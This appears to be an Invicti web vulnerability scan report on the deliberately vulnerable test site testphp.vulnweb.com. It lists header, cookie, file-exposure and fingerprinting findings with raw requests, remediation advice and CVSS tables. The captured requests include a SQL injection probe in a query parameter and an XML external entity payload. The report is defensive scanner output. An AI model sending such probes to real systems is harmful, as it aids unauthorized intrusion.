Content-Security-Policy-Report-Only: script-src 'self'; report-uri: https://example.com;There is no direct impact of not implementing CSP on your website. However, if your website is vulnerable to a Cross-site Scripting attack CSP can prevent successful exploitation of that vulnerability. By not implementing CSP you’ll be missing out on this extra layer of security.
GET / HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Content-Security-Policyin HTTP response headers that instruct the browser to apply the policies you specified.Enable CSP on your website by sending the Content-Security-Policyin HTTP response headers that instruct the browser to apply the policies you specified.
Invicti Standard detected that no Referrer-Policy header implemented.
Referrer-Policy is a security header designed to prevent cross-domain Referer leakage.
Referer header is a request header that indicates the site which the traffic originated from. If there is no adequate prevention in place, the URL itself, and even sensitive information contained in the URL will be leaked to the cross-site.
The lack of Referrer-Policy header might affect privacy of the users and site's itself
GET / HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
In a response header:
Referrer-Policy: no-referrer | same-origin | origin | strict-origin | no-origin-when-downgrading In a META tag
<meta name="Referrer-Policy" value="no-referrer | same-origin"/>In an element attribute
<a href="http://crosssite.example.com" rel="noreferrer"></a>
or
<a href="http://crosssite.example.com" referrerpolicy="no-referrer | same-origin | origin | strict-origin | no-origin-when-downgrading"></a>
Please implement a Referrer-Policy by using the Referrer-Policy response header or by declaring it in the meta tags. It’s also possible to control referrer information over an HTML-element by using the rel attribute.
Cookies are typically sent to third parties in cross origin requests. This can be abused to do CSRF attacks. Recently a new cookie attribute named SameSitewas proposed to disable third-party usage for some cookies, to prevent CSRF attacks.
Same-site cookies allow servers to mitigate the risk of CSRF and information leakage attacks by asserting that a particular cookie should only be sent with requests initiated from the same registrable domain.
GET /AJAX/ HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
The server can set a same-site cookie by adding the SameSite=...attribute to the Set-Cookieheader. There are three possible values for the SameSiteattribute:
Set-Cookie: key=value; SameSite=LaxSet-Cookie: key=value; SameSite=StrictSameSite=Nonemust also specify the Secureattribute to transfer them via a secure context. Setting a SameSite=Nonecookie without the Secureattribute will be rejected by the browsers.Set-Cookie: key=value; SameSite=None; SecureInvicti Standard detected an exposed .htaccess file.
.htaccess files are configuration files for the Apache web server that can be used to override certain server configuration options on a per-directory basis using a human readable file.
If their contents are exposed, attackers can gain valuable insight into your server configuration and may read sensitive data can aid them in further attacks.
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| GET | URI-BASED | FullUrl | .htaccess |
GET /Mod_Rewrite_Shop/.htaccess HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
| OWASP 2013 | A5 |
|---|---|
| OWASP 2017 | A6 |
| CWE | 16 |
| ASVS 4.0 | 14.1.3 |
| NIST SP 800-53 | AC-22 |
| DISA STIG | V-16814 |
| OWASP API Top Ten 2019 | API7 |
| ISO27001 2022 | A.8.9 |
| OWASP Top Ten 2021 | A05 |
| OWASP API Top 10 2023 | API8 |
CVSS 3.0 SCORE | |
|---|---|
| Base | 5.3 (Medium) |
| Temporal | 5.3 (Medium) |
| Environmental | 5.3 (Medium) |
CVSS Vector String |
|---|
| CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N |
CVSS 3.1 SCORE | |
|---|---|
| Base | 5.3 (Medium) |
| Temporal | 5.3 (Medium) |
| Environmental | 5.3 (Medium) |
CVSS Vector String |
|---|
| CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N |
Invicti Standard identified a login page on the target website.
This issue is reported as additional information only. There is no direct impact arising from this issue.
GET /login.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
| OWASP Proactive Controls | C6 |
|---|
Invicti Standard detected a possible SQL file.
GET /admin/create.sql HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/admin/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
| PCI DSS v3.2 | 6.5.8 |
|---|---|
| PCI DSS v4.0 | 6.2.4 |
| OWASP 2013 | A7 |
| OWASP 2017 | A5 |
| CWE | 425 |
| CAPEC | 87 |
| WASC | 34 |
| HIPAA | 164.306(a) , 164.308(a) |
| ASVS 4.0 | 12.5.1 |
| NIST SP 800-53 | AC-22 |
| DISA STIG | V-16814 |
| OWASP Proactive Controls | C7 |
| ISO27001 | A.18.1.3 |
| ISO27001 2022 | A.8.3 |
| OWASP Top Ten 2021 | A01 |
| OWASP API Top 10 2023 | API8 |
CVSS 3.0 SCORE | |
|---|---|
| Base | 5.8 (Medium) |
| Temporal | 5.8 (Medium) |
| Environmental | 5.8 (Medium) |
CVSS Vector String |
|---|
| CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N |
CVSS 3.1 SCORE | |
|---|---|
| Base | 5.8 (Medium) |
| Temporal | 5.8 (Medium) |
| Environmental | 5.8 (Medium) |
CVSS Vector String |
|---|
| CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N |
Invicti Standard detected that autocomplete is enabled in one or more of the password fields.
If user chooses to save, data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers, such as cyber cafes or airport terminals.
GET /login.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
autocomplete="off"to the form tag or to individual "input" fields. However, since early 2014, major browsers don't respect this instruction, due to their integrated password management mechanism, and offer to users to store password internally.| OWASP 2013 | A5 |
|---|---|
| OWASP 2017 | A6 |
| CWE | 16 |
| WASC | 15 |
| ASVS 4.0 | 2.10.3 |
| NIST SP 800-53 | CM-6 |
| DISA STIG | V-16786 |
| ISO27001 | A.14.1.2 |
| ISO27001 2022 | A.8.3 |
| OWASP Top Ten 2021 | A05 |
CVSS 3.0 SCORE | |
|---|---|
| Base | 4.6 (Medium) |
| Temporal | 4.6 (Medium) |
| Environmental | 4.6 (Medium) |
CVSS Vector String |
|---|
| CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
CVSS 3.1 SCORE | |
|---|---|
| Base | 4.6 (Medium) |
| Temporal | 4.6 (Medium) |
| Environmental | 4.6 (Medium) |
CVSS Vector String |
|---|
| CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
Invicti Standard detected the target website is using MySQL as its backend database.
This is generally not a security issue and is reported here for informational purposes only.
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| GET | cat | Querystring | -1 OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT 0x4E4554535041524B4552),9,1)),0)=82-- |
GET /listproducts.php?cat=-1%20OR%201%3d1%20AND%20IFNULL(ASCII(SUBSTRING((SELECT%200x4E4554535041524B4552)%2c9%2c1))%2c0)%3d82--%20 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/categories.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
| OWASP 2017 | A6 |
|---|---|
| CWE | 205 |
| WASC | 13 |
| ASVS 4.0 | 14.3.3 |
| NIST SP 800-53 | AC-22 |
| DISA STIG | V-16814 |
| OWASP API Top Ten 2019 | API7 |
| ISO27001 | A.14.2.5 |
| ISO27001 2022 | A.8.27 |
| OWASP Top Ten 2021 | A05 |
| OWASP API Top 10 2023 | API8 |
CVSS 3.0 SCORE | |
|---|---|
| Base | 4 (Medium) |
| Temporal | 4 (Medium) |
| Environmental | 4 (Medium) |
CVSS Vector String |
|---|
| CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N |
CVSS 3.1 SCORE | |
|---|---|
| Base | 4 (Medium) |
| Temporal | 4 (Medium) |
| Environmental | 4 (Medium) |
CVSS Vector String |
|---|
| CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N |
Invicti Standard identified an Email Address Disclosure.
GET / HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
| CWE | 200 |
|---|---|
| CAPEC | 118 |
| WASC | 13 |
| ASVS 4.0 | 14.3.3 |
| NIST SP 800-53 | AC-22 |
| DISA STIG | V-16814 |
| OWASP Proactive Controls | C7 |
| ISO27001 | A.9.4.1 |
| ISO27001 2022 | A.8.3 |
CVSS 3.0 SCORE | |
|---|---|
| Base | 0 (None) |
| Temporal | 0 (None) |
| Environmental | 0 (None) |
CVSS Vector String |
|---|
| CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N |
CVSS 3.1 SCORE | |
|---|---|
| Base | 0 (None) |
| Temporal | 0 (None) |
| Environmental | 0 (None) |
CVSS Vector String |
|---|
| CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N |
Invicti Standard identified a forbidden resource.
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for informational purposes.
POST /images/ HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 124
Content-Type: application/xml
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
<?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "data:;base64,TlM3NzU0NTYxNDQ2NTc1">]><ns>&lfi;</ns>
Invicti Standard identified a web server (Nginx) in the target web server's HTTP response.
GET / HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
| OWASP 2017 | A6 |
|---|---|
| CWE | 205 |
| WASC | 13 |
| ASVS 4.0 | 14.3.3 |
| NIST SP 800-53 | AC-22 |
| DISA STIG | V-16814 |
| OWASP API Top Ten 2019 | API7 |
| OWASP Proactive Controls | C7 |
| ISO27001 | A.14.2.5 |
| OWASP Top Ten 2021 | A05 |
| OWASP API Top 10 2023 | API8 |
CVSS 3.0 SCORE | |
|---|---|
| Base | 5.3 (Medium) |
| Temporal | 5.1 (Medium) |
| Environmental | 5.1 (Medium) |
CVSS Vector String |
|---|
| CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:H/RL:O/RC:C |
CVSS 3.1 SCORE | |
|---|---|
| Base | 5.3 (Medium) |
| Temporal | 5.1 (Medium) |
| Environmental | 5.1 (Medium) |
CVSS Vector String |
|---|
| CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:H/RL:O/RC:C |
Invicti Standard identified a PHP in the target web server's HTTP response.
GET / HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
| OWASP 2017 | A6 |
|---|---|
| CWE | 205 |
| WASC | 13 |
| ASVS 4.0 | 14.3.3 |
| NIST SP 800-53 | AC-22 |
| DISA STIG | V-16814 |
| OWASP API Top Ten 2019 | API7 |
| OWASP Proactive Controls | C7 |
| ISO27001 | A.14.2.5 |
| OWASP Top Ten 2021 | A05 |
| OWASP API Top 10 2023 | API8 |
CVSS 3.0 SCORE | |
|---|---|
| Base | 5.3 (Medium) |
| Temporal | 5.1 (Medium) |
| Environmental | 5.1 (Medium) |
CVSS Vector String |
|---|
| CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:H/RL:O/RC:C |
CVSS 3.1 SCORE | |
|---|---|
| Base | 5.3 (Medium) |
| Temporal | 5.1 (Medium) |
| Environmental | 5.1 (Medium) |
CVSS Vector String |
|---|
| CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:H/RL:O/RC:C |
Invicti Standard identified an unexpected redirect response body (too large).
This generally indicates that after redirect the page did not finish the response as it was supposed to.
GET /comment.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Response.Redirect("redirected-page.aspx", true)instead of Response.Redirect("redirected-page.aspx", false).exit()after you redirect the user.| Enabled Security Checks | : | Apache Struts S2-045 RCE, Apache Struts S2-046 RCE, BREACH Attack, Code Evaluation, Code Evaluation (Out of Band), Command Injection, Command Injection (Blind), Content Security Policy, Content-Type Sniffing, Cookie, Cross-Origin Resource Sharing (CORS), Cross-Site Request Forgery, Cross-site Scripting, Cross-site Scripting (Blind), Custom Script Checks (Active), Custom Script Checks (Passive), Custom Script Checks (Per Directory), Custom Script Checks (Singular), Drupal Remote Code Execution, Expression Language Injection, File Upload, GraphQL Library Detection, Header Analyzer, HSTS, HTML Content, HTTP Header Injection, HTTP Methods, HTTP Status, HTTP.sys (CVE-2015-1635), IFrame Security, Insecure JSONP Endpoint, Insecure Reflected Content, JavaScript Libraries, JSON Web Token, Local File Inclusion, Log4j Code Evaluation (Out of Band), Login Page Identifier, Malware Analyzer, Mixed Content, MongoDB Injection (Blind), MongoDB Injection (Boolean), MongoDB Injection (Error Based), MongoDB Injection (Operator), Open Redirection, Oracle WebLogic Remote Code Execution, Referrer Policy, Reflected File Download, Remote File Inclusion, Remote File Inclusion (Out of Band), Reverse Proxy Detection, RoR Code Execution, Security Assertion Markup Language (SAML), Sensitive Data, Server-Side Request Forgery (DNS), Server-Side Request Forgery (Pattern Based), Server-Side Template Injection, Signatures, Software Composition Analysis (SCA), Spring4Shell Remote Code Execution, SQL Injection (Blind), SQL Injection (Boolean), SQL Injection (Error Based), SQL Injection (Out of Band), SSL, Static Resources (All Paths), Static Resources (Only Root Path), Unicode Transformation (Best-Fit Mapping), WAF Identifier, Web App Fingerprint, Web Cache Deception, WebDAV, Windows Short Filename, Wordpress Plugin Detection, Wordpress Theme Detection, XML External Entity, XML External Entity (Out of Band) |
|---|---|---|
| URL Rewrite Mode | : | Heuristic |
| Detected URL Rewrite Rule(s) | : | None |
| Excluded URL Patterns | : | gtm\.js WebResource\.axd ScriptResource\.axd |
| Authentication | : | None |
| Authentication Profile | : | None |
| Scheduled | : | No |
| Additional Website(s) | : | None |